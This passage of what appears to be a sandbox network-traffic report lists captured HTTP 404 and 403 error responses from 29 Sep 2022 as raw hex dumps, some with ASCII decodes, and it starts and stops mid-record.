6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:01:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 13:01:18 GMTServer: Apache/2.4.38 (Debian)Content-Length: 278Keep-Alive: timeout=1, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 37 38 2e 31 35 39 2e 39 37 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 78.159.97.210 Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:01:19 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:01:23 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:01:29 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 29 Sep 2022 13:01:31 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 29 Sep 2022 13:01:31 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:01:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 13:01:34 GMTServer: Apache/2.4.38 (Debian)Content-Length: 278Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 